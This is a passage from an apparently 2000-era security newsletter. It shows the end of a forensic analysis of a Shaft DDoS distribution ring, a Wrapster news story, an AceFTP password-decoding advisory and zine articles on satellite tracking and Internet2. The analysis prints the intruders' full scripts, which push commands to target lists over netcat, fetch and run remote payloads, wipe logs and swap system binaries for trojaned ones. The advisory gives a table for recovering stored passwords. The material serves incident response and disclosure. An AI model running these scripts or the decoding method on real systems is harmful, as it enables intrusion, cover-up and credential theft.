file. According to George Weaver this is a standard solsniffer, a Solaris sniffer. The logfiles are expected to be in /usr/man/tmp/output on= =20 infected Solaris boxes. =20 ----------[ Trojan Executable Configuration Files In addition to these files, four more files were recovered that appear to contain information used by the rootkit that was installed on this system. These files are /dev/sda69[a-d]. Here is a listing of what is contained in these files: sda69a This file has the format: where number indicates what type of information follows (always either 1 or= 3) and name indicates the data. For this file, 1 indicates that what follows = is a terminal name, and 3 indicates that what follows is a executable name. This file is used by the trojaned ps and killall to prevend the sysadmin from se= eing or killing the executables listed here, or anything from the listed termina= ls. The contents of the file: 3 egg 3 linsniffer 1 p0 1 p1 3 sniffer 3 mscan 3 bash 3 idle 3 screen 3 ssynk4 3 sshd 3 ssh 3 sshd1 3 s sda69b =20 The format of this file is the same as the format of sda69a, but the conten= ts differ. The 1 in this case means that the data is a subnet to ignore. The= 3 in this case is a specific port number. This file is used by the trojaned netstat and tcpd to know which IP's to hide, which IP's to always let in, and which ports to hide. An example contents follows: 1 xxx. 3 6667 1 yyy. 3 23 1 zzz. 1 ddd.eee 1 ccc. 3 513 1 bbb.aaa. 3 22 Here, the three letter combinations represent single numbers from IP addres= ses.=20 This file would specify that everyone from xxx.*.*.* would be allowed in th= is machine, and no connections from these IP's would appear in netstat. Also, programs listening on ports 6667, 23, 513, and 22 (irc, telnet, rlogin, and ssh) would not appear in a normal netstat. sda69c This file is a list of files, one file per line, that were installed on this system by the attackers. This file is used by ls, dir, vdir, and find to k= now what files not to list when the admin tries to look through the filesystem. sda69d This file is a list of providers, one per line. This file is used by the trojaned syslog to know what messages should not be logged. Section 2: Distribution Methods of the Shaft Toolkit =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D Their more recent work (which includes working with the Shaft DDoS tool) is= all in the base sda69 directory (/dev/sda69). Here is a list of files recovered and what the do: -rwxr-xr-x 1 0 0 25123 Nov 28 14:34 shaftmaster -rwxr-xr-x 1 0 0 15184 Nov 28 14:47 shaftnode This is the master and node executables for the Shaft DDoS tool. For more information, see: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt -rwxr-xr-x 1 0 0 19806 Nov 28 14:41 shaftnode.c This is the source file for the Shaft node program. More information can be found at the same location as above. =20 -rwxr-xr-x 1 0 0 165632 Nov 28 16:34 nc This appears to be the standard netcat executable. This executable was=20 used by the scripts to remotely execute commands. -rw-r--r-- 1 0 0 596 Nov 28 17:12 hitlist This file contains a list of target machines, one machine per line. These were evidently targets to receive the shaftnode program, having previously been compromised. -rwxr-xr-x 1 0 0 84 Nov 28 16:36 dos.sh This shell script run the command dospipe.sh and sends the output to each of the IP's in the file hitlist, port 21 (ftp). This script is a wrapper arou= nd dospipe.sh that executes it for each of the machines in hitlist and sends i= t to the machine. Here is the code from that file: #!/bin/sh for i in `cat hitlist` ; do (./dospipe.sh | ./nc -p 53982 $i 21 &) ; done -rwxr-xr-x 1 0 0 186 Nov 28 16:41 dospipe.sh This shell script outputs a series of commands that are intended to upload = and run a copy of their shaftnode executable to the target machine. This script automates the process of uploading and running their node executables. Her= e is the code for the script: #!/bin/sh echo "oir##t" echo "QUIT" sleep 5 echo "cd /tmp" sleep 5 echo "rcp user@host:shaftnode ./" sleep 5 echo "chmod +x shaftnode" sleep 5 echo "./shaftnode" echo "exit" The first couple lines (the first two echo commands) appear to signify that= a backdoor is being used on the target machines' ftp servers to get the roots= hell they need. The first two lines are sent to the trojanned ftp server, and t= he=20 following lines appear to be commands send to a root shell. -rwxr-xr-x 1 0 0 122880 Oct 24 02:13 duh.tar This is a tar file archive of the next five files: bd.sh, bdpipe.sh, massbd= .sh, neet.tar and unf. -rwxr-xr-x 1 0 0 104 Oct 24 01:55 unf This file is another list of IP's, presumably a list of targets for this "b= d" system. -rwxr-xr-x 1 0 0 10240 Oct 24 02:11 bd.sh This, despite its file extension, is a tar file containing the two files bdpipe.sh and massbd.sh. I believe that this being a tar file is a mistake= and that is should be a shell script that resembles the script dos.sh. -rwxr-xr-x 1 0 0 53 Aug 7 1999 massbd.sh This is a shell script that iterates through all of the lines in a file and runs the scripts bd.sh on each of them in the background. This means that = it runs bd.sh on each of the lines in the file roughly at the same time. I suppose that the file unf is used for this purpose. Here is the code for t= he script: #!/bin/sh for i in `cat $1`; do (./bd.sh $i &);done -rwxr-xr-x 1 0 0 192 Aug 8 1999 bdpipe.sh This is a file that is used to upload and install their trojans and rootkit= s on a SPARC machine, as well as delete the logs and such. It copies neet.tar o= ver to the target machine, run the script bd, and cleans up their work. Here is the code for the script: #!/bin/sh echo "cd /tmp;" echo "rcp user@host:neet.tar ./;" sleep 4 echo "tar -xvf neet.tar;" sleep 4 echo "./bd;" sleep 10 echo "rm -rf neet.tar bd update*;" sleep 10 echo "exit;" It appears that they already have a root shell by the time this script is r= un. Getting the root shell could very well be the contents of the real bd.sh. -rwxr-xr-x 1 0 0 102400 Aug 7 1999 neet.tar This is a tar file that contains 4 other files: bd (a shell script), ps, update, and doc (three SPARC executables). -rwx------ 1 510 510 1076 Aug 5 1999 bd This is a shell script. This is the executable that is run by the other scripts once a system is compromised. This script does a number of things. First of all it copies in its trojaned version of inetd. Secondly it remov= es most of the log files on the system that would implicate them. Then it runs their trojaned inetd and tests it with a telnet session (presumably to test= the backdoor). Then is kills inetd, nfs, and ttdb. Next it runs their update program. Finally it copies their ps program to replace the current system o= ne. Here is the full source of this script: unset HISTFILE; unset SAVEHIST cp doc /usr/sbin/inetd; chown root /usr/sbin/inetd; chgrp root /usr/sbin/inetd; touch 0716000097 /usr/sbin/inetd; rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/r= pc.ttdb* /usr/dt/bin/rpc.ttdb* rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/a= dm/sec* rm -rf /usr/openwin/bin/rpc.cmsd rm -rf /usr/dt/bin/rpc.cmsd /usr/sbin/inetd -s; /usr/sbin/inetd -s; telnet localhost; /usr/sbin/inetd -s; ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo chmod 700 boo =2E/boo ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo chmod 700 boo =2E/boo ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo chmod 700 boo =2E/boo rm -rf boo mkdir /usr/man/tmp mv update ps /usr/man/tmp cd /usr/man/tmp echo 1 \"./update -s -o output\" > /kernel/pssys chmod 755 ps update =2E/update -s -o output & cp ps /usr/ucb/ps mv ps /usr/bin/ps touch 0716000097 /usr/bin/ps /usr/ucb/ps cd / ps -ef | grep bob | grep -v grep ps -ef | grep stat | grep -v grep ps -ef | grep update Section 3: What You Can Do =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D We have, we hope, outlined methods for administrators to examine their systems for compromise by the distributors of the Shaft DDoS tool. A=20 combination of a generic rootkit together with the DDoS package created a ring of machines which could be used to disrupt large network segments. The most important thing is what is repeatedly said -- apply the vendor=20 patches for security updates and keep your system current. Access was gaine= d, no doubt, through well known holes which had patches released some time bef= ore by the vendor. This simple action would have prevented most of the nodes of the tool form being acquired. Secondly, any alert system administrator would have noticed the performance of the machine degrade for no appearant reason. The local administrators of this node complained of crashes and performance problems of this server, yet were not qualified administrators. This is a standard problem, and one that can be easily avoided by training or hiring competent administrators. While the steps we outlined above are above these simple, basic system level administration actions, prevention of this kind of compromise is easily done. Any organization should facilitate the spread of vendor supplied security patches. As noted in the introduction, we have attempted to contact the administrato= rs of the domains listed in the target lists for the distribution of the toolk= it or in the records of where the intruders connected. We are providing this analysis to the community in an effort to facilitate the cleanup from this= =20 ring of intrusions. It spreads worldwide, including Europe and the Pacific Rim, focusing largely on academic instritutions. We have appreciated the=20 response from the community when contacted, and offer to help in any additi= onal ways. Special thanks to George Weaver from PSU for some of his analysis on the SP= ARC trojans we found. Section 4: Selected References =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Dietrich, Sven: Shaft Analysis: http://sled.gsfc.nasa.gov/~spock/shaft_anal= ysis.txt nmap http://www.insecure.org/nmap netcat ftp://coast.cs.purdue.edu/pub/tool/unix/netcat --J/dobhs11T7y2rNN Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.2 iQCVAwUBOOLBWixiYuLsTgIxAQEb6QP/X3CXJVx+TdFHmHPjNn8je0ZpUUiT//Ra 9HgPe1LAgAbDEyQmDx26Gyvk2o8zXxYSazL2caz7B4xupnbPDrYWgDdXCyk//zqD a/WYD5XzORlePaATW2ULV+ALFeoTmZBe0NXPKE6MtbBE4P+JLCDU+PvR3gbMYecL 1p028VzivgA= =pBQV -----END PGP SIGNATURE----- --J/dobhs11T7y2rNN-- @HWA 112.0 Wrapster, the Napster hack fires up the trading fires. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by: Dragos Ruii (You didn't have to stare too hard at the crystal ball to see this one coming. Or the truly anonymous napster clones a la gnutella that will be next. --dr) Napster hack allows free distribution of software, movies By John Borland Staff Writer, CNET News.com March 22, 2000, 4:15 p.m. PT update A new program has been posted on the Internet that transforms a popular music-trading network into a full-blown online swap meet capable of trading videos and software. The program, dubbed Wrapster, has been available for downloading since yesterday. According to its developer, Wrapster allows any kind of file to be listed and traded over the Napster network, which was designed to recognize only MP3 music files. CNET News.com was able to use the program to locate and download several different types of files through Napster. A source at Napster said company executives are aware of Wrapster but have not done anything to block its use. Wrapster joins a growing list of programs allowing the quick, free and wide distribution of illegally copied files. The trend is bad news for record companies, movie studios and software companies that have fought hard to keep their wares from being pirated online. Programs such as Wrapster and Nullsoft's Gnutella, which mimic and expand on Napster, are quickly speeding the erosion of copyright protections online, leaving copyright holders scrambling to keep up. "(Copyright holders) are aggressively pursuing the issue in the courts," said Peter Schalestock, an attorney with Perkins Coie. "They'd like to keep up with the technology, but that is turning into an arms race." Napster, a program designed to let Internet users swap music files with one another, has quickly moved to the heart of the controversy over pirated music and online copyrights. The software allows people to share a library of MP3 music files with anyone else on the Napster system and to freely download songs directly from others' computers. Napster's ease of use and the huge selection of music available through the system have made it a favorite among college students and other communities with high-speed Internet connections. Thousands of people can frequently be found on the network in the evenings, often sharing nearly a million songs with their peers. This has infuriated the recording industry, which views Napster as a tool for piracy. The Recording Industry Association of America (RIAA) has sued the company, charging that its software is facilitating the illegal distribution of material. The industry is asking courts for a potentially huge sum of $100,000 per illegally distributed song. Watch video "The overwhelming majority of the MP3 files offered on Napster are infringing," the RIAA says on a Web page explaining its position. "We believe Napster knows this and even encourages it." To this point, the turmoil has been caused simply by the distribution of music files. Wrapster raises the stakes, however. The Wrapster program tricks the Napster software into thinking that any file or set of files, including items such as software, videos or games, are MP3 files. Its author, identified as "Octavian" in the program's "about" file, suggests using the software as a means for trading programs such as Windows 2000. Octavian could not be reached for comment. While aware of Wrapster, executives at Napster do not yet see it as a problem. "They really see it as something that's benign right now," said Dan Wool, a spokesman for Napster. "Until it poses some kind of problem, they'll just keep the status quo." Napster proponents note that Wrapster's search capabilities aren't unique online. A less well-known program dubbed iMesh allows people to swap music, video and other multimedia files. That provides a broader range of options than Napster itself, which only supports MP3 files, but falls short of the capabilities of the new Wrapster technique. The software also has spawned imitators offering expanded features. Programmers at Nullsoft, the digital music player company recently acquired by America Online, unveiled an open-source effort that, like Wrapster, would allow any kind of file to be shared. Although AOL quickly pulled the project from its site, the code is available elsewhere, and the project may move ahead independently. "Other programs have already tried to imitate Napster's system and even taken it a step further," said Wayne Chang, a Haverhill, Mass., student who manages Napster's online community bulletin boards. "Wrapster is just ripping off the same idea, except this time disguising the files as the only media that Napster currently recognizes." The movie and software industries are watching the RIAA's experience closely, aware that they'll ultimately be subjected to the same pressure. They don't face the same risk of widespread piracy today because high-speed Internet connections still aren't common enough to make numerous downloads of their products feasible. An audio MP3 file generally takes up to half an hour to download over a dial-up connection and just seconds over a cable or DSL modem. A file such as Windows 2000 or a Hollywood movie, however, could take all day over an ordinary modem and potentially hours even over a fast connection. Nevertheless, the studios and software manufacturers are doing their best to protect their works against copying and to threaten potential pirates with high-stakes lawsuits. "It's an arms race as long as someone is trying to get around (copyright protections)," said Rich Taylor, vice president of public affairs for the Motion Picture Association of America (MPAA). "The only things that are preventing a full-blown explosion of video entertainment on the Net are the lack of high-speed connections and the need to secure that digital product." -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com @HWA 113.0 AceFTP vulnerabilty by Armour ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Armour (email) http://www.2600.org.au/advisories/aceftp-032000.txt Vulnerability in AceFTP's Password Storage ------------------------------------------- by Armour - March 2000 Intro: ------ Following black-hand's advisory from November 1999/January 2000 on password storage, it was discovered that AceFTP uses a similar character substitution for local storage of user passwords. Such storage is no better than a plaintext file containing the passwords. Applies to: ----------- AceFTP 2.4a - not tested on earlier versions. Discussion: ----------- AceFTP stores user passwords in the Sites.ini file, typically located at: (C:\Program Files\AceExpertFTP\Sites.ini) Exploit: -------- Entering a password of abcdefghijklmnopqrstuvwxyz, we are able to derive the letter substitution, printed below: A= CB B= C8 C= C9 D= CE E= CF F= CC G= CD H= C2 I= C3 J= C0 K= C1 L= C6 M= C7 N= C4 O= C5 P= DA Q= DB R= D8 S= D9 T= DE U= DF V= DC W= DD X= D2 Y= D3 Z= D0 Here are the contents of a sample Sites.ini file: [multu] Host=hhhh Anonymous=0 User=h SavePassword=1 Password=şCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 HostFolder= Port=21 Firewall=1 LocalFolder1= LocalFolder2= LocalFolder3= Comments="" Working backwards with the substitution table above, we find that şCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 represents abcdefghijklmnopqrstuvwxyz. If an intruder has network or physical access to the Sites.ini file on your hard drive, then your passwords are compromised. The intruder will be able to extract all necasssery information from the file to break into your account(s). Contact: -------- I can be contacted on armour@swish.bur.st -Armour @HWA 114.0 Pursuit Zine #1 (Aug 99) ~~~~~~~~~~~~~~~~~~~~~~~~ Something I seem to have missed, looks like a one off, so i'll preserve it here, you UK phreaks should like this, among others it covers a few things of general interest, have a gander. - Ed XXXX X XXXX XX X X XX XXXX XXXX X X XX XXXXX XX XX XX XX XXX XX XX XX XX XX XXX XX XX XX XX XXX XXX XX XX XX XXXXXX XX XX XX XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXX X XXXXX XXX XXXX XX XX [ P U R S U i T - a u g 9 9 ] X Index for this issue of PURSUiT [0x00] Introduction by the staff [0x01] Editor's notes by bxj [0x02] Internet2 (i2) and Next Generation Internet (NGI) by Cyphunk [0x05] AXS Script Makes WebServer Vulnerable by f0bic [0x06] Boxing in the UK (series) by Oktal [0x07] Introduction to firewalls by deadline [0x08] The FileThief exploit by Mister-X and Alkatraz [0x09] PURSUiT News update If you got an article you want us to publish, please e-mail it to bxj, foney_op or Cyphunk and after we'll read it we will decide if to publish it in PURSUiT or not. In either cases, the writer will be informed. I (bxj) can be contacted at , e-mails to f0bic can be sent to and Cyphunk can be e-mailed to if needed. We all can be reached on the UnderNet IRC network, in the channels #HackTech #HackUK and #KIP. A note for Phrack editors: We come in peace. ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` ` Well, there is not much to tell, just read the editor's notes for ' ' information on the zine, and on each issue. ` ` ' ' We all would like to thank the following people for helping and ` ` making this zine possible: ' ' ` ` Bill Clinton, Al Gor (hey, he invented the net), Monica Lewinsky, ' ' Linda Trip, Jay Lenno, George Lucas, the New York Police, ` ` Jack the ripper (the one who cut people), The guy who invented ' ' air-conditioning, the guy who invented sneakers, Bose Inc., ` ` And rest of the world, except the ones we really really hate. ' ' ` ` Yeah, this one was just to fill up space, so just ignore it, and ' ' we were just kidding about the guy who invented sneakers. ` ` ' ' Don't forget to read the news at the end of the zine. ` ` ' `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`' ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' _______________________ [_______________________] [ ] [ Editor's notes ] [_______________________] [_______________________] What is PURSUiT? PURSUiT is about information. About knowledge. Knowledge is not power, it's an advantage. Information is the real power. We will supply information, and educate on how to use that information. We will supply knowledge, and guide how to control that knowledge. PURSUiT is here to share information, to teach the world what really is going in the underground. No, we will not teach how to make a homade atom bomb. And no, we will not instruct on how to kill your neighboors. We will tell you the stuff that really matters. A little background. PURSUiT started somewhere in 1999, as an idea to get the old-school days back. To be a real, informative zine. We gathered some of the most skilled individuals of this industry, and became one. A smart man once said, that a small group of skilled individuals, excellent with their performance and one with their cause, are better than a whole army. Commandos, they called it. Well, I belive PURSUiT are the commandos of todays digital world. Remember the old days, the days of the BBSs, the telecommunications and computers revolution, the days when "Windows" was not a fluent term in more than 80% of Earth's population, the days when there were almost no script kiddies, when the Internet was not a "super-highway" and when Geocities was not formed yet. The days when true Hackers lived. The days of learning, days of information and days of sharing. PURSUiT is here to return these days. PURSUiT is bringing back the old-school. Peace out, and keep it real, always, --bxj. ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x x x Tracking Satellites Basics x x x x By Overfien x x x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Their are 3 basic types of orbits you should be aware of when tracking satellites. 1) Low altitude circular orbits used by phase 2 satellites 2) Elliptical orbits as used by phase 3 sats. 3) Spacecraft and geostationary orbits planned for phase 4 satellites Satellites are moving targets, so when a ground station uses directional intennas aiming information must be available. Your average daily access time for a satellite is an important quantity in determining how useful the satellite will be to you. A low-altitude satellite (such as SBID, Fugi-OSCAR 20, RS-10/11 or a microsat) will generally be in range for 25 minutes or less each time it passes by. A satellite in high-altitude elliptical orbits for phase 3 space- craft (such as VBeekon, OSCAR 10 and 13) behaves very differently. It will provide one or two passes per day, but the total access time will be (very roughly) 12 hours for Northern hemisphere stations. A geostationary satellite appears to hang motionless in the sky. If it's in range you'll have access to it 24 hours per day (unless the weather really sucks). If it's out of range you'll never see it. Satellite enthusiasts wishing to track a satellite are intrested in specific information. They want to know: 1) When the satellite will be in range; more specifically times for AOS (acquisition of signal) and LOS (loss of signal) for each pass. 2) Where to aim the antenna (azimuth and elevation) at any time. 3) The regions of the earth that have access to the satellite. There are "2" main methods of tracking; which are the graphic method and the computer method. I would like to focus on the computer meth. Tracking software naturally answers the basic tracking questions: It will tell you when the satellite is in range and provide you with antenna pointing data. For example, at each specified time the program may list range (the distance between your station and the satellite), the doppler shift for the mode you specify (which helps you locate your downlink), the height of the satellite (for elliptical orbits this varies), the phase or mean Anomaly (a number that tells how close to you the satellites antennas are currently aimed), predict signal levels (on the downlink), path delay time (often labeled echo) and an orbit number (for refference purpose I believe - no effect on tracking) Lets look at the input the computer requires. Naturally it will need the location of your groundstation in terms of latitude and longitude. Some newer programs may even ask for your height above sea level (this shouldn't have any observable effect for 99.99% of amateur/satellite tracking programs), so even if you live in Seattle and have a monster EME antenna, you can just enter "0" or some approx. "#" if you don't know the correct value. The program also has to know the precise orbit of the satellite you're intrested in via orbit size, shape, orientation with respect of the earth/stars. This is called orbital elemants. Now your basically ready to track. For example, when I boot up my "sat box" basically one of my boxes just used for tracking. A main menu pops up that asks: 1) Do you want Batch tracking data 2) Do you want real-time tracking data 3) Do you want to modify parameters 4) Move to graphical interface 5) Exit program Once I responded by typing a single number (perhaps followed by the enter key) If I respond "1" to obtain Batch tracking data, the program needs to know which sat. your intrested in, the date an time to start the calculations. We now take a look at the Batch output provided by a typical program. I am using the new version of IWI98: ADLMIL 3 Ground Station: lat=39*N, long=77*W, Ht=0km DAY # 602 - - - Friday, August 20 - - - 1999 UTC AZ EL Doppler Range HHMM DEG DEG HZ KM 1145 167 5 - 18353 1200 166 11 -1867 20664 1215 165 16 -1733 22773 1230 166 21 -1596 24694 The heading identifies the satellite "ADLMIL 3" (HEH, I promise its not a military satellite ;-)) My ground station location (I had to change for unexplainable reasons) first 3 columns of the table show time, Azimuth and Elevation. ADLMIL 3 will come in range sometime between 1145 and 1200 utc and remain in range for 'bout 9.5 hours. Column 4 provides data on Doppler shift. AT 1200 UTC a signal coming through the mode B transponder will appear 1867 HZ lower than predicted using the transponder frequency. Because of the algorithm being used to compute Doppler shift, no value is provided for 1145 utc, the first time the satellite comes into range. Alright just as theirs a jargon for practically everthing theirs also one for "Satellite Tracking" heres it broken down: Access range (acquisition distance) Acquisition distance: Maximum distance between the subsatellite point and ground station at which access to spacecraft if possible AOS (Acquisition Of Signal) Apogee: Point on orbit where satellite height is maximum Azimuth: Angle in the horizontal plane measured clockwise with respect to North (North = 0*) Epoch (Epoch time): A reference time at which orbital elements are specified EQX (ascending node) Ground track (subsatellite path): Path on surface of earth traced out by SSP as satellite moves through space Increment (longitudinal increment) LOS (Loss Of Signal) Node: Point where satellite ground track crosses the equatar Pass (satellite pass) TCA (Time of Closest Approach): Time at which satellite passes closest to a specific ground station during orbit of intrest Well, this completes my text on satellite tracking basics. Expect too see more articles in the future until then "watch the sky"!! Overfien@hushmail.com ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= ||PURSUiT is proud to present.. || || || || Internet2 (i2) and Next Generation Internet (NGI) || || || || Compiled by Cyphunk || || || =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= ----------------------------------------------------- - Internet2 (i2) and Next Generation Internet (NGI) - ----------------------------------------------------- Internet2 and NGI are two advanced network initiatives by the US government (for NGI) and UCAID (University Corporation for Advanced Internet Development, for i2.) The key here is initiative. What I mean is that you won't find physical networks that are called Internet2 and NGI. Both NGI and i2 run over existing high speed US Backbone networks such as the vBNS, Abilene, ESNet and many others (discussed later). The only real thing that makes i2 and NGI different from each other is who is in charge. You will see many NGI and i2 peers that are registered under both initiatives. The requirements for becoming a peer on one of these networks is: 1) You have a project that requires very reliable and high-speed connections to another i2 peers. 2) You have a lot of money. The reason for these initiatives was/is: 1) To foster high speed applications of which cannot run on the existing Internet and need a guaranteed connection. 2) To develop smarter network services and ways of guaranteeing bandwidth and latency rates. 3) To increase collaboration of National-to-National and National-to-International research departments (commercial, academic and governmental). A question that may arise is: "Why not just upgrade the existing Internet and use that as the platform for advanced research?" The reason this was not done is because it has become obvious over time that no matter how much bandwidth you throw to the Internet it will be over used. So, instead of thinking BIGGER the NGI and i2 initiatives are mainly about thinking SMARTER. These networks are private to their peers and those peers must have a Research and Development related purpose for being there. This cuts out the general, bandwidth sucking, public right from the start. In order to keep the i2 and NGI peers from causing the same problems amoungst themselves advanced services and "Quality of Service" (QoS) systems and policies have been developed and put in place over these networks to keep one peer from stepping on the toes (line quality) of another. The end goal of many of the advanced applications and technologies being developed by i2 and NGI peers is to have them introduced to the public and commercialized through places such as the internet. Types of applications already being developed involve TeleEmersion and TeleMedicine (to think of a few). After thinking and working *smarter* these networks will go *bigger* and faster. Amongst the goals of i2 and NGI is to develop the fastest and most efficient networks on the planet to "further the US lead in the global IT market" (whatever). To do so, both sides will work together on finding ways to work more efficiently and develop faster hardware devices. When at i2 and NGI conferences you may hear allot of talk about TeraPOP's (Terabit Points of Access). Though there are no TeraPOP's out there yet they are definitely on the horizon (a few years off). Practically all of the literature on the net concerning i2 and NGI are incomplete. The problem is that most of the papers are in M$ PowerPoint format, which really does no good except for the person which created it. It's like looking at teachers' notes when you're not the teacher; it's not helpful. I hope to make this somewhat complete and understandable. However, considering that many of the pieces of these two networks are still under development, don't be surprised if there are some gaps and you finish with more questions than you started with. My one request, however, is that you e-mail me at: mindmore@mindless.com with the questions that this article may raise and any comments/corrections you may have. This article attempts to detail the services and the goals of both NGI and i2. I'll try not to bore you though :) Note: It helps if you already have an understanding of Networking (OSI Layers, Protocols, devices and the likes) to understand the details of i2 and NGI. Also, I realize that there are probably allot of grammer errors, thanks for bearing with me. This paper is split up into 4 sections. The first discusses the Services provided by NGI and i2 (QoS, Multicasting, and IPv6). The second discusses i2 and NGI separately, covering the characteristics of the two individually. The third discusses the physical characteristics of the networks that the i2 and NGI peers connect through. The 4th, brief sections, discusses security issues that I see. I. Services ------------------------------------------------------------------------ As I said before, both i2 and NGI support and are active in developing the standards for IPv6, QoS and Multicasting. I will try get into each networks implementation of these services later. The purpose of this section is to introduce you to the services I just mentioned so that you have a basic understanding about them. > IPv6 in brief IPv6, also known as IPng (IP Next Generation), is the *upgrade* to the currently over killed IPv4 addressing protocol. These addresses are called IP addresses and every computer on the net must have a unique IP address to communicate on the Internet. There are allot of computers on the net and very soon there won't be enough IPv4 addresses left for them. IPv4 addresses are 32-bit addresses. This allows for 4,294,967,296 possible numbers. However, I'm guessing that after segmentation we get around 1.5 billion or so addresses. When this protocol was defined it was thought that a 32-bit address would be plenty. After all, how many computers could the small group of DARPA Geeks own :). However, the Internet became something more then a high speed government and academic network and into the public/global domain. Today we are coming to a point where we just don't have enough IP addresses. I mean, you call you ISP and ask them how much it would cost to get your own Static IP address from them. For me, with my ISP, it is $20 more a month. That is a big jump from FREE. So, the guys and gals at the IETF (Internet Engineering Task Force) have been working on IPv6, which will fix these problems. IPv6 gives us 128-bit addresses represented in binary, of course, and Hexadecimal. 128 bits give -18,446,744,073,709,551,616 squared- possible numbers, which should last us until the transition of the Internet being public/global to becoming extraterrestrial/public/universal. There is more to the protocol than just an increased address space, however. The headers structure of the IP packet has changed. IPv6 headers are somewhat larger then IPv4 headers but IPv6 headers are much more simplified. For instance, the IPv4 header sizes can vary whereas the IPv6 headers are always 40 bytes. Making the headers a fixed size allow for easier processing. IPv6 has also taken away some of the unused fields that were in IPv4 making it simpler. It has also added optional fields that can be used for increased security. For example IPv6 encryption headers indicate which encryption keys to use, and carry other handshaking information. For more info check the IPv6 related RFC's, there are a ton of them. > QoS One thing that people are starting to realize is that no matter how much bandwidth you throw to the public or private sector, they always use it and over use it. Though one objective of i2 and NGI is to increase bandwidth capacity, the other is to manage or regulate who has access to that bandwidth, how much of it and the quality of it. The Internet currently runs as a "Best Effort" service network. This means that if the TIT (Tokyo Institute of Technology) NanoTech department needs 5mbps with no more then a 200ms delay for a joint project with MIT (Massachusetts Institute of Technology), over the internet they will rely on pure luck to get what they need. Luck that the lines from them to MIT will not be saturated with traffic at that time. This is a big problem, because this sort of luck rarely ever happens over the Internet. We need to develop a way to guarantee them the bandwidth and quality they need for that period of time. This is done through QoS (Quality of Service) whose development is primarily the job of the IETF (Internet Engineering Task Force) QoS workgroup. One objective of NGI and i2 is to guarantee end to end QoS. Which means that even if it takes 10 hops to get from TIT in Tokyo to MIT of if it takes 2 hops, they will be guaranteed 5mbps, 200ms, all the way. Currently there are two basic standards being used for QoS: the RSVP protocol and DiffServ. >> RSVP (Resource ReSerVation Protocol) RSVP guarantees end to end bandwidth reservations and delay times from node too node. Unlike DiffServ, which works more in a BB (Bandwidth Broker, ISP)-to-BB basis or Network-to-Network basis whereas RSVP works on a node to node basis. This allows for tighter QoS and is necessary for Multicasting but is not as flexible as DiffServ. RSVP supports multicast groups (discussed later) and RSVP operates on top of IPv4 or IPv6 acting like a layer 4 protocol. RSVP, also, acts like a routing protocol though it does not take the place of existing routing protocols, it operates on top of them (adding features where needed). RSVP causes a higher strain on the network due to the fact that there is checking going on from node to node. For more information on RSVP check out rfc1633 and rfc2205 >> DiffServ (Differentiated Services) DiffServ 